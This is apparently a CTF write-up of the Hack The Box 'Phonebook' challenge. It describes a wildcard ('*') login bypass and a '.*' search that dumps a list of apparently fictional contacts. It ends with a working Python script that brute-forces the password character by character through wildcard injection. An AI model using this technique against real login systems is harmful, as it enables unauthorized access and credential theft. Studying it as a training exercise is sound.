Phonebook

Date: 13, May, 2021

Author: Dhilip Sanjay S

Initial Recon

Initially I couldn't find the username and password for login. So, I was looking for someother endpoint other than login.
I was able to find two other enpoints:
- 964430b4cdd199af19b986eaf2193b21f32542d0
- search

Access Denied

The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept on returning Access Denied - 403 Error message.

Dumping all the contacts in the phonebook

On entering the username and password as a wildcard character (*), I was able to login into the site.

Search using regex (.*)

Now in the search box, I tried the same wildcard character, but it didn't work.
So, I used the regex that matches any string .*, which gave me the following output:

Kyle Reese	[email protected]	555-1234567
Ellery Hun	[email protected]	317-959-9562
Madelaine Lush	[email protected]	636-918-1006
Currey Conti	[email protected]	529-673-3935
Chaim Smoth	[email protected]	895-974-4117
Eldin Jelf	[email protected]	363-426-3563
Ganny Marti	[email protected]	796-793-6925
Jobey Olley	[email protected]	607-345-0290
Katalin Wilde	[email protected]	414-839-2681
Stinky Trood	[email protected]	933-416-1003
Tab Zoren	[email protected]	360-678-3613
Ursula Beer	[email protected]	794-396-6882
Bryan Arman	[email protected]	640-255-8092
Babette Cunio	[email protected]	709-363-0223
Berget Novis	[email protected]	780-278-2572
Ced Engley	[email protected]	230-780-1999
Caryn Germon	[email protected]	967-789-6335
Devina Alcide	[email protected]	828-947-3484
Dionne Lammas	[email protected]	824-561-5676
Emmalynn Burnup	[email protected]	148-856-7052
Fredericka Hanks	[email protected]	762-337-5667
Hannah Inder	[email protected]	315-711-6454
Jay Sharma	[email protected]	893-382-5236
Lilyan Crepel	[email protected]	851-980-1038
Nevile Cogle	[email protected]	296-328-0254
Pansy Godier	[email protected]	126-853-7977
Rubetta Bernth	[email protected]	897-680-2856
Renelle Hyett	[email protected]	453-475-9693
Saul Haill	[email protected]	654-478-5757
Stephanus Massot	[email protected]	717-500-2025
Sarah Moyes	[email protected]	747-445-4381
Sig Tanby	[email protected]	212-473-4506
Shepherd Tunuy	[email protected]	293-455-5209
Teddy Bilby	[email protected]	357-669-5415
Taylor Capsey	[email protected]	118-956-5884
Teddie Redley	[email protected]	658-361-4791
Abagael Guidera	[email protected]	857-685-9711
Arv Teresse	[email protected]	916-453-1626
Bert Father	[email protected]	131-343-2704
Bart McNess	[email protected]	644-208-9958
Corinne Tirone	[email protected]	572-971-8847
Denny Ashmole	[email protected]	345-974-0984
Elenore Puttick	[email protected]	525-705-9780
Frederigo Itzkov	[email protected]	681-753-0881
Jessamyn Trusty	[email protected]	423-494-9425
Jamison Vigurs	[email protected]	161-478-7335
Michal Fearby	[email protected]	844-581-6099
Mellicent Pessolt	[email protected]	735-651-5726
Terencio Ducarne	[email protected]	831-135-9972
Trev Simmers	[email protected]	378-186-4422
Aubrey Castille	[email protected]	930-681-1706
Andria Gossage	[email protected]	184-389-0446
Ansell Shovlin	[email protected]	329-311-4183
Ahmed Swyndley	[email protected]	954-829-5270
Bay Gregori	[email protected]	791-721-1297
Charlie Prangle	[email protected]	869-131-2435
Dianna Chesser	[email protected]	901-185-5817
Denna Duplain	[email protected]	884-899-2850
Davidson Ibotson	[email protected]	709-535-0126
Enid Halbord	[email protected]	318-313-2200
Eimile Pantlin	[email protected]	690-650-9785
Fina Bonsale	[email protected]	631-592-3171
Ives Harvatt	[email protected]	606-103-7270
Jehanna Langmaid	[email protected]	171-550-7961
Karlee Christal	[email protected]	354-231-8489
Koo Hansill	[email protected]	114-439-3748
Kimberley Mourant	[email protected]	792-338-9852
Moll Linster	[email protected]	704-145-7925
Sabra Brumham	[email protected]	222-509-0396
Scottie Bucknell	[email protected]	765-181-5301
Stewart Currier	[email protected]	480-258-4237
Sollie Windham	[email protected]	554-620-3103
Veda Lalonde	[email protected]	788-911-3962
Aguie Baggaley	[email protected]	302-693-4223
April Roskelly	[email protected]	177-474-9382
Burtie Bitcheno	[email protected]	859-267-0856
Brunhilda Courtier	[email protected]	610-896-4215
Baxie Ellesmere	[email protected]	815-678-4391
Daryl Pond-Jones	[email protected]	807-353-1751
Elyse Puckring	[email protected]	619-569-7695
Glen Pickford	[email protected]	101-639-7455
Issi Coupland	[email protected]	943-625-5169
Joey Stienham	[email protected]	214-853-1445
Marylee Parbrook	[email protected]	872-906-8081
Reginauld Meggison	[email protected]	460-793-0851
Sybille Jephcott	[email protected]	454-950-9923
Siouxie Yesichev	[email protected]	215-132-7221
Diana Moncreiff	[email protected]	473-166-1352
Deane Shakelade	[email protected]	747-399-5336
Far Chansonne	[email protected]	215-579-4465
Ivett Danielczyk	[email protected]	777-574-2837
Johnette Vescovini	[email protected]	470-681-1859
Kary Thackeray	[email protected]	592-635-6851
Maris Giacopelo	[email protected]	721-232-8735
Pascal Ainscough	[email protected]	202-416-7489
Valeda Purselowe	[email protected]	407-245-6246
Allin de Glanville	[email protected]	885-440-5379
Marty Chellenham	[email protected]	713-864-5942
Oneida Della Scala	[email protected]	472-913-8907
Vale O' Concannon	[email protected]	547-901-0162
Xavier Semeradova	[email protected]	487-363-1619

But wait, where is the flag??????

Finding the password/flag

We'll try to find the password. My intuition is that the password might be the flag.
We know that the wildcard character (*) will let us login. So, we can try to append some character before and after the wildcard character (*).
So let's try * as the username and HTB{*} as the password, because this the flag format for HTB challenges.
Now we are able to login. This confirms that the password is the flag.
So we need some script to bruteforce the flag.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character
printable = string.printable.replace('*', '')

while True:
	for character in printable:	
		print("Guessing " + ''.join(leaked_pass) + character + "*")
		r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"})
		#print(r.headers['Content-Length'])
		if r.headers['Content-Length'] == '2586':
			leaked_pass.append(character)
			break
			
	# End of the flag
	if leaked_pass[-1] == '}':
		exit()

Solution

We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}

PreviousTemplated NextHTB Academy Overview

Last updated 1 year ago

Initial Recon

Access Denied

Dumping all the contacts in the phonebook

Login with wild card character (*)

Search using regex (.*)

Finding the password/flag

Solution